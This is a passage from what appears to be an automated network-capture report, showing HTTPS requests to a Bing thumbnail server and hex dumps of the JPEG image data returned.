66 d3 d9 c9 76 d6 d1 4a a6 36 6b 21 6f 73 24 84 60 ff 00 Data Ascii: dS:okSG816<\,&S[pIyAzUM2i#.7auZ:Z;j[jY,M&5c.4_yub9Z@G'Ynx,sXJ\|R;cM~UhtR,HC?3gO=m\|4Tc9}]zakfvJ6k!os$`
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: b6 ec 55 42 ab fc 3f 75 bf 3a b2 da 6a 4b 0e fb 4b 98 a7 ff 00 c7 76 8f 7a a7 25 bc 90 73 22 ed 0d fc 55 7a 93 1d 36 37 34 3f 13 dc 69 fe 63 ee 99 8b 60 2c 6b 8d 98 ef 9f fe b5 75 7a 67 89 f4 bb f5 54 92 29 e3 6d bf 7b 8f 99 ff 00 c2 bc cd c6 7a 75 a9 2d a7 96 09 15 d6 b8 b1 18 38 55 d6 da 9e c6 07 35 ad 86 69 37 78 f6 3d 26 49 11 9b 21 b7 0a 6c ed b9 70 5b cc 35 8d a0 df 79 d6 eb bf ef 2a fc d5 a0 a4 9a f1 27 4e 50 93 47 d9 d2 ad 4e b5 35 35 d4 8a e6 1c f4 aa cd 19 11 b2 0e 8d f7 be 5f bd 57 18 e7 8a 16 35 1f ed 56 91 a8 d2 39 ea d1 8c fa 19 73 58 fc ac 42 d5 2b 9b 00 63 f9 62 db fd ef 9a ba 16 40 7a ad 43 24 01 9b da ba 29 e2 1a 7b 9c 35 b0 10 9a d1 1c db 59 63 90 db 4d 57 b8 b6 90 f5 dc df ef 57 4b 2d ba f4 db 55 a6 b6 25 b1 b6 ba a1 8a ee cf 2e b6 5a Data Ascii: UB?u:jKKvz%s"Uz674?ic`,kuzgT)m{zu-8U5i7x=&I!lp[5y*'NPGN55_W5V9sXB+cb@zC$){5YcMWWK-U%.Z
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: fb 41 8e ab a4 5b 5f 43 1f 2c ad bf e5 1e b8 56 19 ae be c7 5d d1 35 4d 72 4b b8 9a 08 a1 56 fd d2 32 94 5f f8 08 27 3f a9 ae 0c 46 12 b5 1a 7c d2 8e 87 b5 82 ce b0 98 ba ea 9d 39 d9 be e3 9a d1 e2 69 9f f8 63 6c 6e 6c 2e e3 ec 3a fe 95 13 9f 4a bf aa f9 57 13 2b c0 d1 e3 6f f0 fd ea a7 e4 b9 55 27 a5 79 0a 77 d5 9f 5c a1 ca ac b5 20 27 d6 9a c4 0a b5 f6 6f e1 dd ff 00 8e d3 3c 80 78 74 6a ae 64 4c a2 da 2a 70 7a d5 7b 84 51 d2 af 4d 6a 43 7d fa 88 c1 db b5 69 19 23 9e a4 5f 53 3d b1 f7 5a a2 99 50 2f 15 7a 48 9d 24 da 57 6d 23 59 a7 cb f3 6e 66 ff 00 66 b7 8b b1 c3 38 dd d8 c7 b8 0c 38 15 17 92 5b e7 dd b4 ff 00 0e da e8 a6 d3 01 87 f7 31 72 bc b3 33 7a fd 6b 3f ec 47 73 79 7f 37 fb b5 bc 2b 25 b1 c3 53 0f 7d d6 86 5c 96 c1 17 2e de 69 93 f8 b9 66 a8 1a Data Ascii: A[_C,V]5MrKV2_'?F\|9iclnl.:JW+oU'yw\ 'o<xtjdL*pz{QMjC}i#_S=ZP/zH$Wm#Ynff88[1r3zk?Gsy7+%S}\.if
2024-11-25 23:25:49 UTC	16069	IN	Data Raw: 3f 34 8f 53 95 15 9a df e6 fb ab 9a 4f 20 9f e1 db 56 b9 3d 29 af bc 2b 63 ad 1c cc 5c a9 11 c7 94 f9 b6 ee a7 a3 87 6e 29 98 91 97 8a 96 d9 47 fc b4 5e 68 64 eb 72 68 c2 f5 dd c7 f7 76 d2 f2 ab c2 b3 7f 77 f8 69 18 a8 6f 91 59 b6 ff 00 76 9b 23 b2 fd f5 e2 b3 b5 cd 51 13 c2 26 ea cb 85 a7 5b 84 45 c0 5d c7 fb d4 bb dc 6d fd d5 4b 1c bb ba d5 5d d8 56 57 b8 d8 e6 d8 d9 29 26 3f ba d8 a9 d2 74 6e 4f ca 3f dd a4 52 0f 55 e6 9c d1 a6 dc 05 e3 fd ea 87 63 44 a4 85 59 62 2b c7 dd a6 6f 5d dc 2b 31 a8 a6 01 55 bf 84 7f bd 50 34 8a 3a 35 35 1b 8a 55 1a 26 92 e8 af fb 27 fd ed d5 5a 4b 89 37 73 f3 7f c0 69 ac 41 5c 96 5c d5 79 1d c2 ec 33 ad 6b 18 a3 39 56 d4 9a 4b 96 46 c9 6e 3f da aa 72 90 78 45 e2 91 c9 ee ca d5 52 69 11 59 81 6a da 30 b9 8c b1 0a da b1 f7 0e Data Ascii: ?4SO V=)+c\n)G^hdrhvwioYv#Q&[E]mK]VW)&?tnO?RUcDYb+o]+1UP4:55U&'ZK7siA\\y3k9VKFn?rxERiYj0
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 6d eb ff 00 8f 53 e5 8a 0f 6b 53 b8 47 79 7a ad f2 ca ac 3f ba d5 61 6f 67 7f be df f8 f5 52 45 b7 55 f9 3f a5 49 19 4d d8 1b b6 fe 14 38 c3 b0 2a f5 7f 98 b4 97 53 06 e7 a7 f0 d4 df da 97 01 b6 47 3a af fc 0a aa 66 22 b8 3f 29 a6 ac 69 f7 c4 aa c7 fb b5 3e ce 0f 74 52 c4 56 5b 48 92 f2 f6 e4 6e 7f b4 f3 fd ef bd 55 97 54 bd 66 c1 9f 77 fe cd 53 0d bf c6 ab 27 fb b9 a4 62 07 dd 89 7f ef 9a 6a 30 5d 06 f1 15 bf 9d 92 c7 a8 5d f4 32 d4 8b 77 74 39 13 b5 54 20 b7 25 78 ff 00 66 8f bc d9 fb b4 b9 21 d8 bf ac 56 fe 66 5d fb 75 c8 5c 79 ed 8a 6c b7 13 6d e6 76 ff 00 be aa bb 1d ab 83 ff 00 a1 52 7c ff 00 29 1b 73 47 24 7b 07 d6 2a b5 f1 32 78 66 b8 0c cf e6 f0 bf ec d2 b5 ec e7 8f 36 a2 65 1d 5e 55 ff 00 76 9d 1e c1 fc 34 72 c7 b0 bd bd 65 f6 87 ac f2 ed e6 76 Data Ascii: mSkSGyz?aogREU?IM8SG:f"?)i>tRV[HnUTfwS'bj0]]2wt9T %xf!Vf]u\ylmvR\|)sG${2xf6e^Uv4rev
2024-11-25 23:25:50 UTC	16384	IN	Data Raw: a0 ea b4 8d 1c 67 fe 59 6d aa f7 49 b6 a3 e3 bc 01 be f3 2f fe 83 52 2d d6 ee 37 b3 55 63 6e 0f 21 69 56 30 9c fd d6 a1 f2 db 41 ea 58 62 c7 76 1a a0 b9 c8 5c 89 55 a8 90 1d df 7a a3 78 83 b5 4a dc 2f 7e 85 5b 89 df 76 04 aa df ee d3 4b 12 bf 7a ac b4 00 7f 0d 2a db 81 cd 6d cd 14 88 57 b9 4f a7 de 65 a6 3b 7f 71 77 55 c9 2d 03 f1 b7 fe f9 a8 9b 4e ca ff 00 74 55 29 c5 8b 52 ac 2f b5 98 9e ad ce da 9f 74 2d d5 6a 44 d3 9c 74 dc c2 a7 5b 3d bc 6d 6c d2 94 e3 71 59 a4 53 56 da d8 4f 94 d4 d1 c9 20 a9 5a d9 ff 00 b9 4b 0d b1 fe ed 27 24 d0 72 bb 9c 87 f6 8e a0 7a 6e 56 a5 6b cd 43 fe 7a b2 d6 ab d9 c3 fc 57 34 e4 b3 b4 db fe bf fe fa ae ff 00 69 0f e5 38 b9 2a 5f 56 64 3d c5 e3 75 9e 4c d2 a3 5e 1f f9 6f 27 fd f5 5b 69 67 6d b7 fd 7a b7 fc 06 86 b4 b6 0d cc Data Ascii: gYmI/R-7Ucn!iV0AXbv\UzxJ/~[vKzmWOe;qwU-NtU)R/t-jDt[=mlqYSVO ZK'$rznVkCzW4i8_Vd=uL^o'[igmz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	49882	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	346	OUT	GET /th?id=OADD2.10239402415503_1IET5OVL073FDA0RX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:49 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 352481 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 6D659266EECC49F6A311F5C0B3D3E6CC Ref B: EWR30EDGE1417 Ref C: 2024-11-25T23:25:49Z Date: Mon, 25 Nov 2024 23:25:48 GMT Connection: close
2024-11-25 23:25:49 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 20 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 32 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 31 30 3a 32 34 20 31 31 3a 30 33 3a 32 39 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1 r2i``Adobe Photoshop 25.12 (Windows)2024:10:24 11:03:298C
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: fd 0d 7d 03 fb 3f 7e d3 ba ee 85 a8 41 a1 7c 4c 9f fb 42 c2 76 02 3d 59 97 69 87 fd ff 00 f1 af 07 7b 59 ed be 79 2c da 30 cb f2 b3 2f 7a 6b da f9 f0 b7 c8 ce 19 70 d5 bc 71 12 5b bb a3 cf af 95 e1 ea af 86 cf ba 3f 4d b4 ab cb 3d 53 4b 83 53 d3 2e 56 e6 d2 e5 43 c5 2c 6d b9 58 1a 9d 79 e0 d7 c1 7f 08 fe 31 78 c3 e1 96 83 67 65 a4 5e 2d d5 8c 52 6c 6d 3e e7 e6 55 4f 55 6a f7 3f 03 fe d6 de 0d d4 75 44 d3 fc 53 a7 cb a3 b4 d8 55 ba fb d1 b1 3e a7 b5 74 46 49 ec cf 9c ad 82 ad 49 bb c6 eb b9 f4 0e 07 fc 0a 86 fb d5 0e 97 7b 65 aa 69 b1 5f 69 b7 70 dd 5b 4a b9 59 22 6d cb 8a 9f f8 aa 8e 68 b4 d6 80 d4 7f 0d 2a f1 43 71 40 68 26 0d 2e 3b 9a 17 de 8c ff 00 df 34 98 98 01 9a 31 96 a3 18 a0 f1 f5 a4 82 20 46 ea 45 a7 2a 8a 31 45 d0 d8 94 ea 45 f4 a3 ff 00 42 a1 Data Ascii: }?~A\|LBv=Yi{Yy,0/zkpq[?M=SKS.VC,mXy1xge^-Rlm>UOUj?uDSU>tFII{ei_ip[JY"mhCq@h&.;41 FE1EEB
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: ed 6f a3 9e 58 17 cb 55 56 fe 32 71 80 7b d7 95 f8 6e 65 85 a6 bd bd 8a 39 24 95 f7 ff 00 ba 3d 2b 91 d7 3c 75 e1 47 bc 83 47 b1 d4 d6 5b 6b 11 b2 49 d7 ee cd 27 73 f4 cd 49 75 e3 5f 0c 43 0a c4 75 35 53 fd dd a7 75 72 d5 c2 62 1b fe 1b fb 8e ec b2 96 03 0d 42 51 55 97 bc f5 d5 2d 11 b1 af 3f da e6 92 45 f9 77 35 76 9e 0c b9 d4 fc 4f 66 9e 1e d3 1e db 4e d3 ad 50 7d aa 44 ea ff 00 e3 5e 46 3e 20 f8 4a 4b e8 ad 0d d5 cf 92 cd 89 67 58 3e 55 1f 4e f5 b5 f0 27 c5 d3 a6 bd a8 78 b1 2c 5a 3f 0e 5a f9 90 34 d2 c9 b7 ce 23 a1 fc 3b d7 46 13 2a c6 c9 fc 0e c2 cd f3 9c b6 38 66 95 44 e7 1f 87 ae bf 97 a1 ea 7a 2f c2 b3 17 8c 13 55 d4 2e 63 9e da cf f7 90 41 12 f3 21 f7 35 85 e3 cb bb fd 53 5a 9e e6 7b 6f 21 62 fd dc 63 ee ac 6a 2b cf fe 25 fe d3 1a f5 fc 92 e9 de Data Ascii: oXUV2q{ne9$=+<uGG[kI'sIu_Cu5SurbBQU-?Ew5vOfNP}D^F> JKgX>UN'x,Z?Z4#;F*8fDz/U.cA!5SZ{o!bcj+%
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: bb 53 21 dd 1d 47 20 3b b0 7a d3 a3 f9 78 a2 e5 5b 42 4c 01 d4 d0 a9 d8 b5 39 47 7a 24 52 7f 8a 95 ee 03 55 80 ea d5 e8 bf 06 74 15 91 9b 58 91 9b f7 7f 24 6b fd 6b cf 14 0f 98 7c d9 af 66 f8 4a 8b 07 86 60 42 cd 86 e5 ab c7 ce ab 4a 18 66 a2 f7 3e ab 84 b0 90 ad 8f 4e 6a ea 3a 9d 4c 60 ba ed 0b c2 d3 94 ed e2 91 a4 10 af 0d b7 75 47 e7 46 5b 01 97 3b 6b e1 f5 3f 60 d1 0e 63 f2 e7 bd 37 96 fa 54 73 46 eb 27 de 56 1f ec d3 90 e5 79 a0 6b 52 55 38 e9 f3 54 b0 8d dd 5a a0 8f 1d 2a d3 32 24 7f bb dc c6 82 65 a1 24 d2 e2 d7 c8 4f 96 36 fb d5 59 82 46 df 22 ff 00 c0 69 a5 f1 1e 2a 38 48 dd cb 6d db 4a c4 28 a4 5a c1 5e 5d bf e0 35 0b 30 1b ce e6 5d b8 3b a9 48 2e d8 dd bb ff 00 65 a8 a6 60 19 96 6f bb 1f dd 6a 63 45 e8 64 22 15 95 1b 69 65 ab 4a c0 ab 49 3c 9b Data Ascii: S!G ;zx[BL9Gz$RUtX$kk\|fJ`BJf>Nj:L`uGF[;k?`c7TsF'VykRU8TZ2$e$O6YF"i8HmJ(Z^]50];H.e`ojcEd"ieJI<
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 54 c6 bf 75 bf 8a b0 b4 b9 83 37 ce ac aa df de fe 2a ea b4 78 62 fb 2b 18 fe 63 fd da e7 c6 56 4a 92 8b 47 56 59 83 94 b1 1e d5 3f 91 9d af 69 fe 6c 8b 3a f9 6b e5 73 b5 b9 aa b1 b6 f5 de 56 35 2d fc 31 ae d5 fc ab a0 ba b5 b8 6b 76 12 40 d1 34 9f c2 cb f3 62 b1 2e ac dd 37 6c e8 bf 7a b9 28 d7 72 87 25 cf 43 15 84 51 ad ed 14 75 62 79 0f 70 df bd 89 64 89 7f e7 9d 5b 4d 2a dc c3 80 bc 56 95 85 c4 b1 69 30 5b 79 50 2f 96 a7 e6 58 fe 66 cf 76 3d e9 73 b9 79 ac eb 57 95 ed 16 74 61 b0 71 b5 e6 8c 6d 4a 01 06 9f e4 c9 f2 af 55 68 d7 6d 61 36 a1 a9 e9 f1 b1 8a 4f 32 26 fe f7 55 ae b2 f8 24 91 b4 52 2e f1 58 7a c5 b0 92 d7 01 7e 55 fb d5 d3 85 ac 9e 93 d4 f3 f3 0c 1c ad cd 47 4b 1e f9 fb 11 6a ad ad 78 3f 5c d0 f5 3d 32 46 d3 ee 1f cb 59 d5 b7 75 1c ae 3b 57 Data Ascii: Tu7xb+cVJGVY?il:ksV5-1kv@4b.7lz(r%CQubypd[MVi0[yP/Xfv=syWtaqmJUhma6O2&U$R.Xz~UGKjx?\=2FYu;W
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: 51 64 97 7e dd ed ba 9c 9e 5b af 32 f9 7f 2d 43 70 83 6c 64 3f 3f c4 b4 8f 21 75 58 f6 fd d5 a9 48 d3 9d 5a c1 34 52 79 98 4f 98 7f 79 69 ca 82 36 c6 ed c5 7e f5 2a 89 3c 9c a2 b3 76 dc bf 76 96 d2 ce 5b 89 3c b4 97 6b 37 f7 ab 42 1c 6f ad cb 96 b7 37 d0 c3 93 75 23 47 bb 3e 5c 78 aa 5a 95 ed dd e4 98 b8 95 9a 56 6f bd 26 77 63 b0 ad 8b 8b 38 34 e6 8e da 2b e8 2f a4 93 06 49 22 ce d8 cf a7 35 3c d7 97 8d 1f d8 e4 89 54 ff 00 0a ac 61 77 51 4e ae b6 b1 8d 5a 71 e4 ba 3b df d8 c3 4c 97 fe 12 ad 63 51 b9 b1 59 56 de 05 4b 6b b6 8c fe ec 9f bc 14 f4 fa d7 a8 7c 66 f1 1e 95 a1 78 7d ed ef 96 e6 49 ee 93 10 46 9c 23 1e d9 f5 02 b0 7e 0a f8 53 c4 be 1f f0 b3 5c df 6a f0 da e9 f2 fe fe 5b 55 52 c7 9e ec dd b8 ec 2b 85 f8 c9 e2 5b 6f 13 78 bb 3a 77 99 f6 2b 34 f2 Data Ascii: Qd~[2-Cpld??!uXHZ4RyOyi6~*<vv[<k7Bo7u#G>\xZVo&wc84+/I"5<TawQNZq;LcQYVKk\|fx}IF#~S\j[UR+[ox:w+4
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: c2 33 1c 9a df 89 1e 3b ad 6a e5 8b 6d 8f e6 4b 51 fd d1 9e a7 de ad 61 f9 2d 24 73 d7 cc 63 0a 7c 8d 68 65 fe cd bf 0b d7 c2 56 b7 3e 23 d4 ff 00 7b a8 6a 71 a7 91 1c 8b b4 da c6 3b 7b 31 ef 5e 91 a8 79 f2 dc 2c 71 f4 fe 2a bb 71 3e f5 c9 6d df dd a8 a1 65 da f9 6e 7f 86 bb 21 29 de ec f9 7a f2 55 1b 31 75 59 a2 b4 85 ad e3 fe 2f bc df 4a c7 10 f8 96 f2 e9 46 8f a6 c7 2d aa a9 2f 3d cc db 23 5c 7e a6 a5 f1 42 5c aa c9 f6 78 96 59 23 52 56 36 6d ab 21 ec 33 5c 26 b5 a7 fc 63 f8 8b 0a e9 5f 63 b4 d0 74 fb 35 c4 8b 6d 33 a4 77 07 dc 8e 5b f0 ae ca f8 88 d1 a4 ac f5 67 0e 0f 03 3c 4e 21 ca 6d 46 11 ea f6 38 8f 8a 3e 28 d6 35 5f 13 2d b4 f7 30 ca 2c 58 db 47 f6 26 2c b3 12 70 71 9e b5 eb 7f 03 7e 12 8d 12 e1 3c 51 ae df 47 fe ab 7f 91 bb 09 07 7c b1 ee 6a e7 Data Ascii: 3;jmKQa-$sc\|heV>#{jq;{1^y,q*q>men!)zU1uY/JF-/=#\~B\xY#RV6m!3\&c_ct5m3w[g<N!mF8>(5_-0,XG&,pq~<QG\|j
2024-11-25 23:25:50 UTC	16067	IN	Data Raw: 3e 65 46 e9 39 af bc da 56 4d bb 87 cb b7 1f 2d 39 76 49 1b 18 ff 00 86 b2 e1 d4 ad dd 5b 7c aa ac bf 79 6a 75 9e 0d b9 8d 97 1d 37 6e fb d5 c6 e9 4a 3b a3 d6 8e 22 95 45 ee c9 7d e4 de 58 2d b1 db 68 6e 37 7f 76 ab be 9e 86 16 27 cb 62 df c3 53 ab fc bc ae e2 df c5 ba a4 b7 31 fd ab 12 ae e5 db f7 55 b6 d3 52 94 76 61 2a 74 e7 ba 31 a4 b0 0d 26 c0 bb 7b 55 77 b7 b8 86 6c ee 6c c7 fc 2d f3 6e ae 8a eb ec ce df b9 83 cb 0b fe d6 ea af 20 49 37 07 fd db 2f dd dc b5 d3 47 11 3b 9e 56 2b 2f a7 2d 63 a1 1c 7e 24 bb 93 49 5d 3e 6b 6f 2a d5 5b 3b 96 3d cd bf d7 3d 6a 38 26 82 49 98 c1 78 b2 05 fb ab b4 ab 66 ae 5a c3 72 ec b1 46 b0 37 9a db 77 34 1c fe 02 b5 f5 4f 0f 26 9b e1 b8 cd e7 88 d6 4b e9 5c 18 34 98 2d a3 66 58 fb b4 92 0e 41 f6 ae a7 4a 94 a3 cd b3 3c Data Ascii: >eF9VM-9vI[\|yju7nJ;"E}X-hn7v'bS1URvat1&{Uwll-n I7/G;V+/-c~$I]>ko[;==j8&IxfZrF7w4O&K\4-fXAJ<
2024-11-25 23:25:50 UTC	16384	IN	Data Raw: 18 e3 ff 00 1a b0 8a 56 1d bf 74 af de a8 a4 b4 8e 56 57 95 9b 72 af ca b5 9f 36 a6 de ca 56 29 2c 77 08 ac 53 e6 fe ee ef e2 a2 4b 7d 46 4f be 9b bf e0 55 7e 4c c7 1a e3 ee 7d d5 a7 33 16 5c 9f 94 ee a7 ed 19 3f 57 4d 6a cc 68 ed ef 44 d8 75 da 37 7c db 9a af 47 6f e7 2e 0b 6d 1f ec fc b5 6d 62 cb 72 fb 85 4c b0 c4 ac a0 7c bf f0 1a 52 ac d9 70 c2 a5 b1 59 22 b7 81 73 e5 b4 8d b7 ee ab 7c b5 2d bf 9e d2 2b 3e d8 e3 da 7f 75 1f cb f9 9a 7c 9b 37 30 0b ba 9d 0c 27 a8 ac 5c ae 74 46 1a 86 dd b1 fd d5 51 fa d3 15 07 6d cc 37 7c db aa 6f dd 96 c4 8c ab fe f5 34 3c 66 4c 24 bb bf bd f2 d2 b9 af 50 f2 a3 91 98 05 e7 f4 a9 23 de 8d e5 f9 4b b7 ff 00 41 a7 a3 aa 6e 03 e6 2d fc 54 e0 fb e4 c5 4b 6c d2 28 45 60 17 ef 7c df dd a1 98 0e b5 3a ed e8 76 d4 53 18 fe 62 Data Ascii: VtVWr6V),wSK}FOU~L}3\?WMjhDu7\|Go.mmbrL\|RpY"s\|-+>u\|70'\tFQm7\|o4<fL$P#KAn-TKl(E`\|:vSb
2024-11-25 23:25:50 UTC	16384	IN	Data Raw: f2 6a 39 75 2b 7e 9b 5b fe fa ae 32 e3 5e 07 a4 fc 55 66 d7 23 1c ee a8 59 7c db d8 a9 71 0d 18 ad 19 da cd aa 44 8c c6 3e bd 36 d5 6b 9b 93 22 e7 e6 c7 5a e3 ff 00 b6 c7 65 56 2d fe d5 4d 0e b9 27 cc 0f 96 a7 fd ea d1 60 26 b6 46 4f 3e a5 2d e4 75 b6 d7 8a ab 9f 29 bf da 6d d4 f9 26 81 b9 76 dd b7 fb d5 c7 4b ab 07 e5 db 9a 86 4d 5f 6f 1b b8 a3 ea 33 64 bc fa 9c 15 af 73 af 92 ea 38 d9 9b 72 d4 2d aa ca 24 e2 26 51 fe f0 ae 56 4d 62 0e 9b b9 ff 00 66 93 fb 6a 2d b8 dc d5 a7 d4 65 d5 18 3c fa 0f ed 1d 84 7a 8e d8 d8 9f de 16 fe f3 7d da 81 af 9a 4e 8a ab 5c 9f f6 9c 7b 72 25 a3 fb 48 bf fc b7 e3 fe f9 aa 58 19 76 33 96 7d 4e df 11 d8 25 c0 5d a7 cd 55 2b 53 43 a8 85 dc 59 95 8f f7 ab 85 5d 47 2d fe bf 8e 9b 6a 44 d5 11 3a b5 0f 2f 93 22 39 f4 56 c7 68 da Data Ascii: j9u+~[2^Uf#Y\|qD>6k"ZeV-M'`&FO>-u)m&vKM_o3ds8r-$&QVMbfj-e<z}N\{r%HXv3}N%]U+SCY]G-jD:/"9Vh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.6	49885	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:48 UTC	375	OUT	GET /th?id=OADD2.10239378034176_1VAY6I95TXDSQZZRC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:49 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 720699 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 0AADED6C3CC1435E8245C04C30DE7D06 Ref B: EWR30EDGE0422 Ref C: 2024-11-25T23:25:49Z Date: Mon, 25 Nov 2024 23:25:48 GMT Connection: close
2024-11-25 23:25:49 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 b6 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 30 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 30 32 20 30 38 3a 31 31 3a 33 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.0 (Windows)2023:11:02 08:11:328
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: da a3 12 8c 7f 35 15 3c 91 3a d3 23 81 da 80 1b 52 a3 53 e4 83 6d 33 65 00 4f 1b 54 d1 b5 55 8d 76 fd fa 92 39 51 6a 4d 0b 51 cb 56 23 92 a8 47 2f cf 52 f9 a9 f7 ea 39 4a 2f c7 2e da 23 9e a8 47 2e ea 3c d7 a3 94 0b fe 6d 3e 39 6a ac 2d bb ef d5 a8 f6 6c a8 28 9d 1b 65 4b 1b 55 2f 36 9b e7 ed a0 0d 18 e5 45 fb f5 a1 63 3a 56 0c 72 d4 f1 cf b6 8e 40 e7 3a 38 ee 76 fd cf bb 44 9b ee 7e fd 64 c1 73 fd ff 00 9e ae 5a cb ba a7 90 d3 9c af 7d 62 ea ff 00 27 f1 d6 5c eb b7 e4 ae a3 f7 32 a7 cf 51 c9 a4 43 72 db d3 ee d0 66 72 32 36 ea 8e 35 ae ca 4f 0e 5b 32 7f b5 55 64 d0 76 ff 00 c0 ea 83 90 e6 63 57 ab 96 a9 f2 7c f5 76 ea cf ec cd b3 65 3e 35 85 7e fd 00 55 ab 51 b3 d4 91 ac 3f c1 4f 8f 62 d4 9a 10 49 16 ea ab 22 ba d6 a4 7b 2a 1b af 26 80 32 64 f9 7e fd 57 Data Ascii: 5<:#RSm3eOTUv9QjMQV#G/R9J/.#G.<m>9j-l(eKU/6Ec:Vr@:8vD~dsZ}b'\2QCrfr265O[2UdvcW\|ve>5~UQ?ObI"{*&2d~W
2024-11-25 23:25:49 UTC	16384	IN	Data Raw: f2 d1 b6 15 fe 34 ff 00 be e8 f3 d1 53 67 9c 9f f7 da 51 22 e3 38 15 67 b6 da fb 29 be 5d 5a 8e 2d df 73 e7 a2 48 1e 82 0a 72 2d 3a 3b 67 64 de 88 fb 7f bf 56 3c 87 ae a3 43 89 d6 1d 8a 9f 2a 27 f1 a5 45 5a bc a6 b4 a9 73 19 1a 6e 91 60 ba 6f da 6e f7 bc bf f3 c5 df 65 4f 69 2c 2d 32 a7 d8 ed d2 24 f9 f6 6c ad 0d 4a 28 67 7d ee ee f2 ff 00 b1 59 fe 47 96 ff 00 3e c4 d9 5c 5c ce 5f 11 d7 ca a3 f0 9a 52 2d 85 cb b7 da 21 f3 b6 27 c9 bf e7 fb f5 5f fe 11 7b 0f f5 ce f7 1f 7f 7e cf e0 a9 be d3 a6 db 43 be f7 52 b4 b7 d8 9f f2 da 64 4a cd be f8 8d e0 fd 3d 1d 3f b6 d2 e3 e4 fb 96 f0 bc b5 8f ef bf e5 d1 ac bd 8f da 37 23 8a 1b 98 5a da e1 3f 75 b3 62 7c 95 97 26 87 a2 79 db 37 dc 22 ff 00 bf 59 fa 6f c4 4f 